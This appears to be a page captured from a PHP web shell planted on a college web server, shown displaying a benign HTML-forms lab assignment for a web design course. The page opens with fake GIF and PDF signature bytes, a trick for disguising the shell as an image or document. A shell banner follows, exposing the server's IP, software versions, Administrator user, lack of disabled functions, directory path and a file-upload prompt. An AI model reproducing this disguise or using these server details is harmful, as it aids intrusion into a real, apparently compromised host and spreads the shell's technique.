GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1022/AllenLabs/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Week 5</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <link href="Week%205%20Forms_files/style.css" rel="stylesheet" type="text/css"> </head> <body data-pt-ext-theme="dark" data-pt-ext-size="standard" background="Week%205%20Forms_files/background.gif"> <p class="pagetitle" align="center">MMDT1022 HTML II and Javascript<br> Week 5</p> <hr> <table width="750" cellpadding="4" border="0" bgcolor="#FFFFFF"> <tbody><tr> <td width="100%"><p>Week 5</p> <p>Read chapter 16 in the 8th edition in the HTML & CSS book. This chapter is about creating forms. Submission of a form requires a working cgi program on the server to accept your input from the form and to process it. The cgi programs can be written in may different languages. Some of the popular ones are Perl, C++, JSP, ASP.NET, or PHP.</p> <p>In class we will be putting together this <a href="http://mmdt1022.ridgewater.net/week5/shirt.htm">form</a> to order t-shirts.<br> The submission posting action URL is http://tools.ridgewater.net/scripts/tshirt/mail.php</p></td> </tr> </tbody></table> <br> <table width="750" cellpadding="4" border="0"> <tbody><tr> <td bgcolor="#FFFFFF"><p>Lab Forms</p> <p><b>Do:</b> Create a submission form. Your posting action will be to the URL http://tools.ridgewater.net/scripts/jmail/data.php</p> <p>Here is a <a href="http://mmdt1022.ridgewater.net/week5/contactform.gif">snapshot</a> of the form and the form variable names. Also shown is the form action that is called upon submission. Note: Pay careful attention to the variable name case. Variable names are cAsE sEnSiTiVe.</p> <p>Build the web page containing the form. Once built and published, test your form. <b>All</b> input fields will be echoed back if your form is working correctly. That will be how you know if you did everything correctly.</p> <table width="500" cellspacing="0" cellpadding="5" border="1"> <tbody><tr> <td width="85%"><b>Grading Criteria</b></td> <td width="15%" align="right"><b>Points<br> 15</b></td> </tr> <tr> <td width="85%">Form with all fields working. </td> <td width="15%" align="right">15</td> </tr> </tbody></table> <p>Assignment is due one week from when it was assigned. 50% penalty if late.</p></td> </tr> </tbody></table> <hr> <p> </p> <p> </p> <div></div></body></html>